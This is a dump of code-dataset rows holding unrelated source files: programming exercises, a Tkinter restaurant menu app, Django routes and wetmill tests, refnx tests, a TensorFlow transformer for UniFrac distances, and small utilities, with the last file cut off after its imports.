seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
35255656510 | ## https://www.hackerrank.com/challenges/py-set-discard-remove-pop/problem
n = int(input())
s = set(map(int, input().split()))
for i in range(int(input())):
c = str(input()).split()
if c[0] == 'pop': s.pop()
elif c[0] == 'remove': s.remove(int(c[1]))
elif c[0] == 'discard': s.discard(int(c[1]))
print(sum(s))
# n = int(input())
# s = set(map(int, input().split()))
# for i in range(int(input())):
# eval('s.{0}({1})'.format(*input().split()+['']))
# print(sum(s)) | abinesh1/pythonHackerRank | sets/prob30.py | prob30.py | py | 488 | python | en | code | 0 | github-code | 13 |
41839937422 | import os
from Tkinter import *
from tkMessageBox import *
root=Tk()
root.title("Indian Restaurant")
root.geometry('1367x768')
root.configure(background='Thistle')
v1=IntVar()
v2=IntVar()
v3=IntVar()
v4=IntVar()
v5=IntVar()
v6=IntVar()
v7=IntVar()
v8=IntVar()
v9=IntVar()
v10=IntVar()
#===============Functions=============================================
def check():
if v1.get()+v2.get()+v3.get()+v4.get()+v5.get()+v6.get()+v7.get()+v8.get()+v9.get()+v10.get()== 0:
showerror('Error','No item is Selected')
else:
Label(root,text="Rs.",font="cambria 20 bold").grid(row=10,column=1,sticky=W,padx=40)
Label(root,text=v1.get()+v2.get()+v3.get()+v4.get()+v5.get()+v6.get()+v7.get()+v8.get()+v9.get()+v10.get(),font="times 20 bold").grid(row=10,column=1)
def order():
if v1.get()+v2.get()+v3.get()+v4.get()+v5.get()+v6.get()+v7.get()+v8.get()+v9.get()+v10.get() == 0:
showerror('Error','No item is Selected')
else:
showinfo('Success','Order is Booked')
def pay():
if v1.get()+v2.get()+v3.get()+v4.get()+v5.get()+v6.get()+v7.get()+v8.get()+v9.get()+v10.get() == 0:
showerror('Error','No item is Selected')
else:
showinfo('Success','Transaction is Completed. Thank You. Visit Again! :)')
def back():
os.startfile("restaurant.py")
root.quit()
#===============Labels and Buttons================================
Label(root,text="|| Indian Foods ||",font="Georgia 30 bold",bg="SeaGreen",fg="Gold",width=50,bd=20).grid(row=0,column=0,columnspan=4)
Label(root,text="Select your Food you want to eat?",font="cambria 20 bold",bg="lightblue").grid(row=1,column=0,pady=30,padx=0)
Label(root,text="North India:",font="cambria 20 bold",bg="OrangeRed").grid(row=2,column=0,sticky=W)
Checkbutton(root,text='Kadai Paneer(150)',font="cambria 20 bold",bg="Thistle",variable=v1,onvalue=150).grid(row=3,column=0,sticky='W')
Checkbutton(root,text='Mix Veg(150)',font="cambria 20 bold",bg="Thistle",variable=v2,onvalue=150).grid(row=4,column=0,sticky='W')
Checkbutton(root,text='Butter Panner Masala(200)',font="cambria 20 bold",bg="Thistle",variable=v3,onvalue=200).grid(row=5,column=0,sticky='W')
Checkbutton(root,text='Dum Aloo(100)',font="cambria 20 bold",bg="Thistle",variable=v4,onvalue=100).grid(row=6,column=0,sticky='W')
Checkbutton(root,text='Butter Roti(10)',font="cambria 20 bold",bg="Thistle",variable=v5,onvalue=10).grid(row=7,column=0,sticky='W')
Label(root,text="South India:",font="times 20 bold",bg="OrangeRed").grid(row=2,column=2,sticky=W)
Checkbutton(root,text='Idli & Sambhar(50)',font="cambria 20 bold",bg="Thistle",variable=v6,onvalue=50).grid(row=3,column=2,sticky='W')
Checkbutton(root,text='Uttapam(60)',font="cambria 20 bold",bg="Thistle",variable=v7,onvalue=60).grid(row=4,column=2,sticky='W')
Checkbutton(root,text='Dosa(70)',font="cambria 20 bold",bg="Thistle",variable=v8,onvalue=70).grid(row=5,column=2,sticky='W')
Checkbutton(root,text='Pongal(80)',font="cambria 20 bold",bg="Thistle",variable=v9,onvalue=80).grid(row=6,column=2,sticky='W')
Checkbutton(root,text='Vada(30)',font="cambria 20 bold",bg="Thistle",variable=v10,onvalue=30).grid(row=7,column=2,sticky='W')
Button(root,text="Check Rs.",font="times 20 bold",relief=SUNKEN,bg="black",fg="white",command=check,bd=10).grid(row=9,column=1,sticky=W,pady=30)
Button(root,text="Back",font="times 20 bold",relief=SUNKEN,bg="black",fg="white",command=back,bd=10).grid(row=9,column=0,sticky='W',padx=60,pady=30)
Button(root,text="Order",font="times 20 bold",relief=SUNKEN,bg="black",fg="white",command=order,bd=10).grid(row=9,column=2,sticky='W',pady=30)
Button(root,text="Pay",font="times 20 bold",relief=SUNKEN,bg="black",fg="white",command=pay,bd=10).grid(row=9,column=3,sticky='W',pady=30)
Label(root,text="Total Amount of Indian Food:",font="times 20 bold").grid(row=10,column=0,columnspan=1)
root.mainloop()
| sumiie24/Sumex-Plaza | Files/indian.py | indian.py | py | 4,074 | python | en | code | 0 | github-code | 13 |
5213763415 | #coding=utf-8
#Version: python3.6.0
#Tools: Pycharm 2017.3.2
_author_ = ' Hermione'
m,n=map(int,input().split())
cnt=0
res=0
def is_primer(num):
if num>1:
for j in range(2,num):
if num%j==0:
return False
else:
return True
else:
return False
for i in range(m,n+1):
if is_primer(i) is True:
cnt+=1
res+=i
print("{} {}".format(cnt,res))
# 首先要明确素数定义,注意1 和 2的特殊性
| Harryotter/zhedaPTApython | ZheDapython/z4/z4.2.py | z4.2.py | py | 490 | python | en | code | 1 | github-code | 13 |
22232621574 | from django.views.generic import TemplateView
from django.contrib import admin
from django.urls import include, path
from drf_spectacular.views import (
SpectacularAPIView, SpectacularSwaggerView
)
urlpatterns = [
path(
'admin/',
admin.site.urls
),
path(
'api/',
include('api.urls')
),
path(
'redoc/',
TemplateView.as_view(template_name='redoc.html'),
name='redoc'
),
# Djoser эндпоинты для управления пользователями
path(
'api/v1/',
include('djoser.urls')
),
# JWT-эндпоинты, для управления JWT-токенами:
path(
'api/v1/',
include('djoser.urls.jwt')
),
# swagger
path(
'api/schema/',
SpectacularAPIView.as_view(),
name='schema'
),
# Путь для спеки от Swagger
path(
'api/schema/swagger-ui/',
SpectacularSwaggerView.as_view(url_name='schema'),
name='swagger-ui'
),
]
| DmitriyEKonovalov/api_final_yatube | yatube_api/yatube_api/urls.py | urls.py | py | 1,063 | python | ru | code | 0 | github-code | 13 |
31195569571 | from pathlib import Path
import os
import pickle
import numpy as np
from refnx.reflect import SLD, Slab, ReflectModel, Motofit
from refnx.dataset import ReflectDataset
from numpy.testing import (
assert_equal,
assert_,
)
class Test__InteractiveModeller:
def setup_method(self):
self.pth = Path(__file__).absolute().parent
sio2 = SLD(3.47, name="SiO2")
air = SLD(0, name="air")
si = SLD(2.07, name="Si")
d2o = SLD(6.36, name="D2O")
polymer = SLD(1, name="polymer")
self.structure = air | sio2(100, 2) | si(0, 3)
theoretical = np.loadtxt(self.pth / "theoretical.txt")
qvals, rvals = np.hsplit(theoretical, 2)
self.qvals = qvals.flatten()
self.rvals = rvals.flatten()
# e361 is an older dataset, but well characterised
self.structure361 = si | sio2(10, 4) | polymer(200, 3) | d2o(0, 3)
self.model361 = ReflectModel(self.structure361, bkg=2e-5)
self.model361.scale.vary = True
self.model361.bkg.vary = True
self.model361.scale.range(0.1, 2)
self.model361.bkg.range(0, 5e-5)
# d2o
self.structure361[-1].sld.real.vary = True
self.structure361[-1].sld.real.range(6, 6.36)
self.structure361[1].thick.vary = True
self.structure361[1].thick.range(5, 20)
self.structure361[2].thick.vary = True
self.structure361[2].thick.range(100, 220)
self.structure361[2].sld.real.vary = True
self.structure361[2].sld.real.range(0.2, 1.5)
self.e361 = ReflectDataset(self.pth / "e361r.txt")
self.qvals361, self.rvals361, self.evals361 = (
self.e361.x,
self.e361.y,
self.e361.y_err,
)
self.app = Motofit()
self.app(self.e361, model=self.model361)
def test_run_app(self):
# figure out it some of the parameters are the same as you set them
# with
slab_views = self.app.model_view.structure_view.slab_views
for slab_view, slab in zip(slab_views, self.structure361):
assert_equal(slab_view.w_thick.value, slab.thick.value)
assert_equal(slab_view.w_sld.value, slab.sld.real.value)
assert_equal(slab_view.w_isld.value, slab.sld.imag.value)
assert_equal(slab_view.w_rough.value, slab.rough.value)
assert_equal(slab_view.c_thick.value, slab.thick.vary)
assert_equal(slab_view.c_sld.value, slab.sld.real.vary)
assert_equal(slab_view.c_isld.value, slab.sld.imag.vary)
assert_equal(slab_view.c_rough.value, slab.rough.vary)
def test_fit_runs(self):
parameters = self.app.objective.parameters
assert_(self.app.dataset is not None)
assert_(self.app.model.structure[1].thick.vary is True)
var_params = len(parameters.varying_parameters())
assert_equal(var_params, 6)
# sometimes the output buffer gets detached.
try:
self.app.do_fit(None)
except ValueError:
pass
| refnx/refnx | refnx/reflect/test/test__interactive_modeller.py | test__interactive_modeller.py | py | 3,072 | python | en | code | 31 | github-code | 13 |
15523858223 | from itertools import chain, tee
def format_pdst(func):
def wrapper(*args, **kwargs):
output = func(*args, **kwargs)
f_value = lambda x: f"{x:.05f}"
f_line = lambda x: " ".join(map(f_value, x))
return "\n".join(map(f_line, output))
return wrapper
@format_pdst
def pdst(data):
seqs = [s[1] for s in gen_seqs(data)]
return [[p_distance(i, j) for i in seqs] for j in seqs]
def p_distance(s1, s2):
return sum(a != b for (a, b) in zip(s1, s2)) / len(s1)
def gen_seqs(data):
idx_lines = (n for (n, l) in enumerate(data) if l.startswith(">"))
# add last line to iter
idx_lines = chain(idx_lines, (len(data),))
for i, j in pairwise(idx_lines):
id_seq, seq = data[i], "".join(data[i + 1 : j])
yield id_seq, seq
def pairwise(iterable):
a, b = tee(iterable)
next(b, None)
return zip(a, b)
DATA_FILE = "dat/rosalind_pdst.txt"
SAMPLE_DATA = """
>Rosalind_9499
TTTCCATTTA
>Rosalind_0942
GATTCATTTC
>Rosalind_6568
TTTCCATTTT
>Rosalind_1833
GTTCCATTTA"""
SAMPLE_OUTPUT = """
0.00000 0.40000 0.10000 0.10000
0.40000 0.00000 0.40000 0.30000
0.10000 0.40000 0.00000 0.20000
0.10000 0.30000 0.20000 0.00000"""
if __name__ == "__main__":
# Assert sample
SAMPLE_DATA = SAMPLE_DATA.split()
assert pdst(SAMPLE_DATA) == SAMPLE_OUTPUT.lstrip()
# Read data
with open(DATA_FILE, "r") as f:
data = [l.strip() for l in f.readlines()]
# Produce output
print(pdst(data))
| neumann-mlucas/rosalind | src/rosalind_pdst.py | rosalind_pdst.py | py | 1,486 | python | en | code | 0 | github-code | 13 |
39068971110 | from tns_glass.tests import TNSTestCase
from django.core.urlresolvers import reverse
from .models import *
class WetmillTest(TNSTestCase):
def test_unique_sms(self):
self.login(self.admin)
post_data = dict(country = self.rwanda.id,
name = "Musha",
sms_name = 'nasho',
description = "Musha is a better wetmill ever, ha?",
province = self.gitega.id,
year_started = 2009,
coordinates_lat = '-1.56824',
coordinates_lng = '29.35455')
create_url = reverse('wetmills.wetmill_create')
response = self.client.post(create_url, post_data)
self.assertEquals(200, response.status_code)
def test_crudl(self):
self.login(self.admin)
next_url = 'next='+reverse('wetmills.wetmill_create')
pick_country_url = reverse('locales.country_pick') + '?' + next_url
response = self.client.get(pick_country_url)
self.assertIn(response.context['view'].get_context_data()['next'], next_url)
post_data = dict(country=self.rwanda.id)
response = self.client.post(pick_country_url, post_data, follow=True)
self.assertEqual(response.context['form'].initial['country'], self.rwanda)
create_url = reverse('wetmills.wetmill_create')
self.assertEqual(create_url, response.request['PATH_INFO'])
self.assertEqual(self.rwanda, response.context['form'].initial['country'])
# make sure we only list rwanda provences, we shouldn't display any provences in kenya
self.assertNotContains(response, "Kibirira")
post_data = dict(country=self.rwanda.id,
name="Musha",
sms_name='musha',
description="Musha is a better wetmill ever, ha?",
province=self.gitega.id,
year_started=2009,
altitude=1050,
accounting_system='2012',
coordinates_lat='-1,56824',
coordinates_lng='29,35455')
# should fail because cordinates use comma instead of period
response = self.client.post(create_url, post_data)
self.assertTrue('form' in response.context)
self.assertTrue('coordinates' in response.context['form'].errors)
post_data = dict(country=self.rwanda.id,
name="Musha",
sms_name='musha',
description="Musha is a better wetmill ever, ha?",
province=self.gitega.id,
year_started=2009,
altitude=1050,
accounting_system='2012',
coordinates_lat='-1.56824',
coordinates_lng='29.35455')
response = self.client.post(create_url, post_data)
self.assertEquals(302, response.status_code)
wetmill = Wetmill.objects.get(name='Musha')
self.assertEquals("Musha", str(wetmill))
self.assertRedirect(response, reverse('wetmills.wetmill_list'))
update_url = reverse('wetmills.wetmill_update', args=[wetmill.id])
response = self.client.get(update_url)
# assert our provences are only the ones in rwanda
self.assertNotContains(response, "Kibirira")
post_data['name'] = 'Musha2'
post_data['coordinates_lat'] = ''
post_data['coordinates_lng'] = ''
# should fail because there are no coordinates
response = self.client.post(update_url, post_data)
self.assertEquals(200, response.status_code)
self.assertTrue('form' in response.context)
post_data['coordinates_lat'] = '-1,5894'
post_data['coordinates_lng'] = '29,3454'
# should fail because coordinates use comma instead of period
response = self.client.post(update_url, post_data)
self.assertEquals(200, response.status_code)
self.assertTrue('form' in response.context)
post_data['coordinates_lat'] = '-1.5894'
post_data['coordinates_lng'] = '29.3454'
response = self.assertPost(update_url,post_data)
wetmill = Wetmill.objects.get(pk=wetmill.pk)
self.assertEquals('Musha2', wetmill.name)
response = self.client.get(reverse('wetmills.wetmill_list'))
self.assertContains(response, 'Musha2')
def test_crudl_permission(self):
self.login(self.viewer)
# by default, viewer's cannot update wetmills
update_url = reverse('wetmills.wetmill_update', args=[self.nasho.id])
response = self.client.get(update_url)
self.assertRedirect(response, reverse('users.user_login'))
# give the viewer permissions for nasho
from guardian.shortcuts import get_objects_for_user, assign
assign("%s_%s" % ('wetmill', 'wetmill_edit'), self.viewer, self.nasho)
# try again
response = self.client.get(update_url)
self.assertEquals(200, response.status_code)
# shouldn't work for the other wetmill
response = self.client.get(reverse('wetmills.wetmill_update', args=[self.coko.id]))
self.assertRedirect(response, reverse('users.user_login'))
# shouldn't work for creating a wetmills
response = self.client.get(reverse('wetmills.wetmill_create') + "?country=%d" % self.rwanda.id)
self.assertRedirect(response, reverse('users.user_login'))
# unless we give them country level
assign("%s_%s" % ('country', 'wetmill_edit'), self.viewer, self.rwanda)
response = self.client.get(reverse('wetmills.wetmill_update', args=[self.coko.id]))
self.assertEquals(200, response.status_code)
# make sure a post works
post_data = dict(country = self.rwanda.id,
name = "Musha",
sms_name = 'musha',
description = "Musha is a better wetmill ever, ha?",
province = self.gitega.id,
year_started = 2009,
altitude=1050,
accounting_system='2012',
coordinates_lat = '-1.56824',
coordinates_lng = '29.35455')
response = self.client.post(reverse('wetmills.wetmill_update', args=[self.coko.id]), post_data)
self.assertRedirect(response, reverse('public-wetmill', args=[self.coko.id]))
# make sure we can also create a new wetmill
response = self.client.get(reverse('wetmills.wetmill_create') + "?country=%d" % self.rwanda.id)
self.assertEquals(200, response.status_code)
post_data['name'] = "Test"
post_data['sms_name'] = "Test"
response = self.client.post(reverse('wetmills.wetmill_create') + "?country=%d" % self.rwanda.id, post_data)
self.assertRedirect(response, reverse('public-country', args=[self.rwanda.country_code]))
# no dice for kenya though
response = self.client.get(reverse('wetmills.wetmill_update', args=[self.kaguru.id]))
self.assertRedirect(response, reverse('users.user_login'))
def test_ordering(self):
self.login(self.admin)
# clear out existing wetmills, we want to test the order of just the ones
# we create below
Wetmill.objects.all().delete()
rwanda_zaon = Wetmill.objects.create(country=self.rwanda,name='Zaon',sms_name='zaon',description='zaon',province=self.gitega,
year_started=2005, created_by=self.admin, modified_by=self.admin)
kenya_habari = Wetmill.objects.create(country=self.kenya,name='Habari',sms_name='habari',description='habari',province=self.kibirira,
year_started=2005,created_by=self.admin, modified_by=self.admin)
rwanda_biryogo = Wetmill.objects.create(country=self.rwanda,name='Biryogo',sms_name='biryogo',description='biryogo',province=self.bwanacyambwe,
year_started=2005,created_by=self.admin, modified_by=self.admin)
kenya_sanaga = Wetmill.objects.create(country=self.kenya,name='Sanaga',sms_name='sanaga',description='sanaga',province=self.mucoma,
year_started=2005, created_by=self.admin, modified_by=self.admin)
rwanda_abatarutwa = Wetmill.objects.create(country=self.rwanda,name='Abatarutwa',sms_name='abatarutwa',description='abatarutwa',province=self.gitega,
year_started=2005, created_by=self.admin, modified_by=self.admin)
kenya_kelicho = Wetmill.objects.create(country=self.kenya,name='Kelicho',sms_name='kelicho',description='kelicho',province=self.mucoma,
year_started=2005, created_by=self.admin, modified_by=self.admin)
response = self.client.get(reverse('wetmills.wetmill_list'))
wetmills = response.context['wetmill_list']
self.assertEquals(kenya_habari, wetmills[0])
self.assertEquals(kenya_kelicho, wetmills[1])
self.assertEquals(kenya_sanaga, wetmills[2])
self.assertEquals(rwanda_abatarutwa, wetmills[3])
self.assertEquals(rwanda_biryogo, wetmills[4])
self.assertEquals(rwanda_zaon, wetmills[5])
def test_update_csps(self):
self.login(self.admin)
csp_url = reverse('wetmills.wetmill_csps', args=[self.nasho.id])
# shouldn't have a current csp
self.assertEquals(None, self.nasho.current_csp())
response = self.client.get(csp_url)
self.assertEquals(2, len(response.context['form'].fields))
self.assertContains(response, "Rwanda 2009")
self.assertContains(response, "Rwanda 2010")
# associate csp's for both our rwandan seasons
post_data = dict()
post_data['csp__%d' % self.rwanda_2009.id] = self.rtc.id
post_data['csp__%d' % self.rwanda_2010.id] = self.rwacof.id
response = self.assertPost(csp_url, post_data)
# rwacof should be current
self.assertEquals(self.rwacof, self.nasho.current_csp())
# assert our db is in sync
self.assertEquals(self.rtc, self.nasho.get_csp_for_season(self.rwanda_2009))
self.assertEquals(self.rwacof, self.nasho.get_csp_for_season(self.rwanda_2010))
self.assertEquals(None, self.nasho.get_csp_for_season(self.kenya_2011))
# test the initial data when viewing the form again
response = self.client.get(csp_url)
self.assertEquals(self.rtc.id, response.context['form'].initial['csp__%d' % self.rwanda_2009.id])
# now update again, clearing out our 2010 mapping
del post_data['csp__%d' % self.rwanda_2010.id]
response = self.assertPost(csp_url, post_data)
# check the db once more
self.assertEquals(self.rtc, self.nasho.get_csp_for_season(self.rwanda_2009))
self.assertEquals(None, self.nasho.get_csp_for_season(self.rwanda_2010))
self.assertEquals(None, self.nasho.get_csp_for_season(self.kenya_2011))
# we shouldn't have a current csp anymore either
self.assertEquals(None, self.nasho.current_csp())
# test our get method as well
season_csps = self.nasho.get_season_csps()
self.assertEquals(1, len(season_csps))
self.assertEquals(self.rtc, season_csps[0].csp)
self.assertEquals(self.rwanda_2009, season_csps[0].season)
self.assertEquals("Rwanda 2009 - Rwanda Trading Company = Nasho", str(season_csps[0]))
def test_import_views(self):
response = self.client.get(reverse('wetmills.wetmillimport_list'))
self.assertRedirect(response, reverse('users.user_login'))
self.login(self.admin)
response = self.client.get(reverse('wetmills.wetmillimport_list'))
self.assertEquals(200, response.status_code)
create_url = reverse('wetmills.wetmillimport_create')
response = self.client.get(create_url)
f = open(self.build_import_path("wetmill_import.csv"))
post_data = dict(csv_file=f, country=self.rwanda.id)
response = self.assertPost(create_url, post_data)
wm_import = WetmillImport.objects.get()
self.assertEquals('PENDING', wm_import.get_status())
wm_import.import_log = ""
wm_import.save()
wm_import.log("hello world")
wm_import = WetmillImport.objects.get()
self.assertEquals("hello world\n", wm_import.import_log)
response = self.client.get(reverse('wetmills.wetmillimport_read', args=[wm_import.id]))
self.assertContains(response, "PENDING")
response = self.client.get(reverse('wetmills.wetmillimport_list'))
self.assertContains(response, "PENDING")
def build_import_path(self, name):
import os
from django.conf import settings
return os.path.join(settings.TESTFILES_DIR, name)
def test_import(self):
east = Province.objects.create(name="East", country=self.rwanda, order=2, created_by=self.admin, modified_by=self.admin)
west = Province.objects.create(name="West", country=self.rwanda, order=3, created_by=self.admin, modified_by=self.admin)
path = self.build_import_path("wetmill_import.csv")
# clear existing wetmills
Wetmill.objects.all().delete()
wetmills = import_csv_wetmills(self.rwanda, path, self.admin)
self.assertEquals(2, len(wetmills))
nasho = Wetmill.objects.get(name="Nasho")
self.assertEquals("Nasho", nasho.name)
self.assertEquals("East", nasho.province.name)
self.assertEquals("nasho", nasho.sms_name)
self.assertEquals(2010, nasho.year_started)
self.assertDecimalEquals("-1.99", nasho.latitude)
self.assertDecimalEquals("30.02", nasho.longitude)
self.assertEquals(1539, nasho.altitude)
git = Wetmill.objects.get(name="Gitarama")
self.assertEquals("Gitarama", git.name)
self.assertEquals("West", git.province.name)
self.assertEquals("gitarama", git.sms_name)
self.assertIsNone(git.year_started)
self.assertIsNone(git.latitude)
self.assertIsNone(git.longitude)
self.assertIsNone(git.altitude)
# change one of nasho's values
nasho.sms_name = "somethingdiff"
nasho.save()
# import again, should be brought back
wetmills = import_csv_wetmills(self.rwanda, path, self.admin)
nasho = Wetmill.objects.get(name="Nasho")
self.assertEquals("nasho", nasho.sms_name)
def assertBadImport(self, filename, error):
path = self.build_import_path(filename)
try:
reports = import_csv_wetmills(self.rwanda, path, self.admin)
self.fail("Should have thrown error.")
except Exception as e:
self.assertIn(error, str(e))
def test_bad_imports(self):
east = Province.objects.create(name="East", country=self.rwanda, order=2, created_by=self.admin, modified_by=self.admin)
west = Province.objects.create(name="West", country=self.rwanda, order=3, created_by=self.admin, modified_by=self.admin)
self.assertBadImport("wetmill_import_no_name.csv", "Missing name for row")
self.assertBadImport("wetmill_import_no_province.csv", "Missing province for row")
self.assertBadImport("wetmill_import_bad_province.csv", "Unable to find province")
self.assertBadImport("wetmill_import_no_sms.csv", "Missing sms name for")
self.assertBadImport("wetmill_import_bad_header.csv", "CSV file missing the header")
self.assertBadImport("wetmill_import_bad_decimal.csv", "Invalid decimal value")
| TechnoServe/SMSBookkeeping | tns_glass/wetmills/tests.py | tests.py | py | 15,988 | python | en | code | 0 | github-code | 13 |
41767659810 | import sys
def reversebyte(dump,dumpout):
c = len(dump)
c -= 1
for i in range (len(dump)):
dumpout[i] += dump[c]
i += 1
c -= 1
return dumpout
def openfile (s):
sys.stderr.write(s + "\n")
sys.stderr.write("Usage: %s <infile> <outfile>\n" % sys.argv[0])
sys.exit(1)
if __name__ == '__main__':
if len(sys.argv) != 3:
openfile("invalid argument count")
outfile = sys.argv.pop()
infile = sys.argv.pop()
file = open(infile,"rb")
dump = bytearray(file.read())
dumpout = bytearray(len(dump))
outdump = reversebyte(dump,dumpout)
new = open(outfile,"wb")
new.write(outdump)
new.close()
file.close()
| DmitryMeD/Small_RE_tools | reversebyte.py | reversebyte.py | py | 694 | python | en | code | 2 | github-code | 13 |
4415839575 | from random import choice
class MorphemeGeneratorMixin:
def map_syll_to_structure(self, syll):
if len(syll) == 2:
return 'CV'
elif len(syll) == 4:
return 'CVCV'
else:
if syll[-1] in self.inventory['V']:
return 'CVV'
else:
return 'CVC'
def get_more_complex_syllable(self, syll):
if not syll:
return 'CV'
structure = self.map_syll_to_structure(syll)
hierarchy = ['CV', 'CVC', 'CVV', 'CVCV']
try:
return hierarchy[hierarchy.index(structure) + 1]
except IndexError:
return hierarchy[0]
def gen_morpheme(self, label, syll_structure='CV', noop=False):
structure = syll_structure.capitalize()
templates = {'CV': '{c1}{v1}', 'CVC': '{c1}{v1}{c2}', 'CVV': '{c1}{v1}{v2}', 'CVCV': '{c1}{v1}{c2}{v2}'}
if noop:
syll = ''
else:
syll = None
template = templates[structure]
while (not syll) or syll in self.syllables:
if len(self.syllables) < self.inventory['max_{}'.format(structure)]:
syll = template.format(c1=choice(self.phonological_inventory['C']),
v1=choice(self.phonological_inventory['V']),
c2=choice(self.phonological_inventory['C']),
v2=choice(self.phonological_inventory['V']))
else:
template = self.get_more_complex_syllable(structure)
self.syllables.add(syll)
self.inventory[label] = syll | swizzard/language_generator | morpheme_generator.py | morpheme_generator.py | py | 1,684 | python | en | code | 1 | github-code | 13 |
34141178752 | import pandas as pd
import numpy as np
import tensorflow as tf
from simple_transformer import TransformerBlock, TokenEmbedding
from biom import load_table
from tensorflow import keras
from keras.layers import MultiHeadAttention, LayerNormalization, Dropout, Layer
from keras.layers import Embedding, Input, GlobalAveragePooling1D, Dense
from keras.models import Sequential, Model
# Save table #
table_path = 'unifrac-dataset/training/data/filtered-merged.biom'
table = load_table(table_path)
vocab = table.shape[0]
MAX_OBS_PER_SAMPLE=int(np.max(table.pa(inplace=False).sum(axis='sample')))
print(MAX_OBS_PER_SAMPLE)
BATCH_SIZE=16
def process_input(line):
# load data from files
defs = [float()] + [str()]*4
fields = tf.io.decode_csv(line, record_defaults=defs, field_delim='\t')
distance = fields[0]
table_info = tf.strings.split(fields[1:], sep=',')
table_info = tf.strings.to_number(table_info, out_type=tf.dtypes.int32)
# make batch index come first
table_info = table_info.to_tensor(shape=(4, BATCH_SIZE, MAX_OBS_PER_SAMPLE))
table_info = tf.transpose(table_info, perm=[1,0,2])
# normalize the table so that sample depths sum to 1
s1_obs, s1_count, s2_obs, s2_count = tf.split(table_info, num_or_size_splits=4, axis=1)
s1_depth = tf.math.reduce_sum(s1_count, axis=2, keepdims=True)
s1_count = tf.math.divide(s1_count, s1_depth)
s2_depth = tf.math.reduce_sum(s2_count, axis=2, keepdims=True)
s2_count = tf.math.divide(s2_count, s2_depth)
# remove dim
s1_obs = tf.reshape(s1_obs,[BATCH_SIZE, -1])
s1_count = tf.reshape(s1_count,[BATCH_SIZE, -1])
s2_obs = tf.reshape(s2_obs,[BATCH_SIZE, -1])
s2_count = tf.reshape(s2_count,[BATCH_SIZE, -1])
return (s1_obs, s1_count, s2_obs, s2_count), distance
def csv_reader_dataset(file_path):
ds = tf.data.Dataset.list_files(file_path, shuffle=False)
ds = ds.cache()
ds = ds.repeat()
ds = ds.shuffle(1000)
ds = ds.interleave(
lambda file_path: tf.data.TextLineDataset(file_path),
cycle_length=tf.data.AUTOTUNE,
num_parallel_calls=tf.data.AUTOTUNE)
ds = ds.shuffle(10000)
ds = ds.batch(BATCH_SIZE, num_parallel_calls=tf.data.AUTOTUNE)
ds = ds.map(process_input, num_parallel_calls=tf.data.AUTOTUNE)
return ds.prefetch(tf.data.AUTOTUNE)
ds = csv_reader_dataset('unifrac-dataset/training/input/*')
v_ds = csv_reader_dataset('unifrac-dataset/training/input/*')
# for (s1_obs, s1_count, s2_obs, s2_count), y in ds.take(1):
# # process_input(file)
# # print(ds.map(process_input(line)))
# print(s2_obs,s2_count)
# step 3 create model
embed_dim=128
num_heads=5
num_layers=4
ff_dim=256
max_obs=MAX_OBS_PER_SAMPLE
def build_model(mask_zero=False):
input_obs_16s = Input(shape=(max_obs), batch_size=BATCH_SIZE)
input_counts_16s = Input(shape=(max_obs), batch_size=BATCH_SIZE)
input_obs_wgs = Input(shape=(max_obs), batch_size=BATCH_SIZE)
input_counts_wgs = Input(shape=(max_obs), batch_size=BATCH_SIZE)
embedding_layer = TokenEmbedding(vocab, embed_dim, mask_zero=mask_zero)
transformer_blocks = [TransformerBlock(embed_dim, num_heads, ff_dim)
for _ in range(num_layers)]
trans_dense = Dense(max_obs, activation="relu")
#################### 16s transformer twin #############################
x_obs_16s = embedding_layer(input_obs_16s)
for i in range(num_layers):
x_obs_16s = transformer_blocks[i](x_obs_16s)
x_obs_16s = tf.reshape(x_obs_16s, [x_obs_16s.shape[0], -1])
x_obs_16s = tf.keras.layers.Concatenate(axis=1)([x_obs_16s, input_counts_16s])
x_obs_16s = trans_dense(x_obs_16s)
################### wgs transformer twin ############################
x_obs_wgs = embedding_layer(input_obs_wgs)
for i in range(num_layers):
x_obs_wgs = transformer_blocks[i](x_obs_wgs)
x_obs_wgs = tf.reshape(x_obs_wgs, [x_obs_wgs.shape[0], -1])
x_obs_wgs = tf.keras.layers.Concatenate(axis=1)([x_obs_wgs, input_counts_wgs])
x_obs_wgs = trans_dense(x_obs_wgs)
################### combine 16s and wgs ############################
x_obs = tf.keras.layers.Concatenate(axis=1)([x_obs_16s, x_obs_wgs])
x_obs = Dense(max_obs, activation="relu")(x_obs)
x_obs = Dense(max_obs/2, activation="relu")(x_obs)
outputs = Dense(1)(x_obs)
model = Model(inputs=(input_obs_16s, input_counts_16s, input_obs_wgs, input_counts_wgs), outputs=outputs)
learning_rate = tf.keras.optimizers.schedules.CosineDecayRestarts(0.001, 1000, alpha=0.00001, m_mul=0.98)
optimizer = tf.keras.optimizers.Adam(learning_rate, beta_1=0.9, beta_2=0.999,
epsilon=1e-8)
model.compile(loss="mse", optimizer=optimizer)
return model
model = build_model(mask_zero=True)
cp_callback = tf.keras.callbacks.ModelCheckpoint('unifrac-dataset/checkpoint/cp.ckpt',
save_weights_only=True,
verbose=1)
model.load_weights('unifrac-dataset/checkpoint/cp.ckpt')
# model.fit(ds,steps_per_epoch=1000, epochs=120, validation_steps=1000,callbacks=[cp_callback])
print(model.predict(v_ds , steps=1))
for x, y in ds.take(1):
pred_y = model.call(x, training=False)
print(y, pred_y)
# print(y)
| kwcantrell/scale-16s | transformer/16s_wgs_unifrac_twin_transformer.py | 16s_wgs_unifrac_twin_transformer.py | py | 5,236 | python | en | code | 0 | github-code | 13 |
14803486985 | # -*- coding: utf-8 -*-
"""
Created on Mon May 20 11:48:14 2019
@author: King23
"""
"""
Code Challenge
Name:
Space Seperated data
Filename:
space_numpy.py
Problem Statement:
You are given a 9 space separated numbers.
Write a python code to convert it into a 3x3 NumPy array of integers.
Input:
6 9 2 3 5 8 1 5 4
Output:
[[6 9 2]
[3 5 8]
[1 5 4]]
"""
import numpy as np
numbers=input()
numbers=numbers.split(' ')
numbers_ndarray=np.array(numbers)
numbers_ndarray=numbers_ndarray.reshape(3,3)
print(numbers_ndarray) | anuj378/ForskLabs | DAY 11 - Numpy & MatplotLib/MyCode/space_numpy.py | space_numpy.py | py | 569 | python | en | code | 0 | github-code | 13 |
39814477630 | # Python imports
import unittest
import geopandas as gpd
import numpy as np
import os
import shutil
